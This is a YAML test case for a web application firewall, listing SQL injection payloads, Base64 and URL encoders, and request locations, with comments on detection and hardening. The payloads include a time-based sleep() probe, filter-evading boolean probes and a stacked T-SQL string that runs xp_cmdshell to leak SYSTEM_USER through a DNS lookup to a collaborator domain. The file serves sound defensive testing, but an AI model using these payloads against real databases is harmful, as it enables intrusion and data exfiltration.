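# WAF test case: SQL injection strings that the WAF under test is expected to
# flag. Presumably every payload is sent once per encoder/placeholder pair
# listed below -- confirm against the harness that consumes this file.
# The payload strings are fixtures: keep them byte-for-byte, because a changed
# character changes which rule the test exercises.
payload:
# Time-based blind probe: sleep(15) inside a nested subselect, repeated so the
# string stays well-formed in unquoted, single-quoted and double-quoted
# (%22) contexts. Detection signals: sleep() in a subquery, and a response
# delayed by about 15 s if the request reaches the database.
- "(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'%22+(select(0)from(select(sleep(15)))v)+%22*/"
# Stacked T-SQL statements: builds a ping command whose hostname carries the
# hex-encoded SYSTEM_USER and runs it through xp_cmdshell, i.e. an out-of-band
# leak via a DNS lookup. The /* */ separators and the split hostname literal
# look intended to defeat plain signature matching. Defence in depth behind
# the WAF: keep xp_cmdshell disabled, run the application login without
# sysadmin rights, and alert on unexpected DNS queries from database hosts.
- "3;/* a */ DECLARE @c varchar(255);/* b */SELECT @c='ping '+master.sys.fn_varbintohexstr(convert(varbinary,SYSTEM_USER))+'.000.burpcol'+'laborator.net';/*xx*/ EXEC Master.dbo.xp_cmdshell @c;/*xxx*/ EXEC sp_SYS_ProtoOp @id=3"
# Boolean-based probe that closes a quoted, parenthesised value and builds its
# comparison from JSON_EXTRACT instead of a numeric tautology; rules keyed
# only on patterns such as "1=1" will not match it.
- "-1134') OR JSON_EXTRACT('{''aKER'': 9648}', '$.aKER') = 9648*7799 AND ('QlYa' LIKE 'QlYa"
# Boolean-based probe for an unquoted, parenthesised numeric context; the
# JSON_DEPTH() comparison plays the same role as JSON_EXTRACT above.
- "123) AND 12=12 AND JSON_DEPTH('{}') != 2521"
# Encodings applied to each payload before it is sent (names as the harness
# defines them). A WAF has to decode these before matching, otherwise the
# Base64 variant passes unseen.
encoder:
- Base64Flat
- URL
# Request locations the payload is placed in. Coverage should be judged per
# location: a rule set that inspects only URL parameters still lets the same
# string through in a header, JSON body or multipart form.
placeholder:
- URLPath
- URLParam
- JSONRequest
- Header
- HTMLForm
- HTMLMultipartForm
# Category label for this test set.
type: SQL Injection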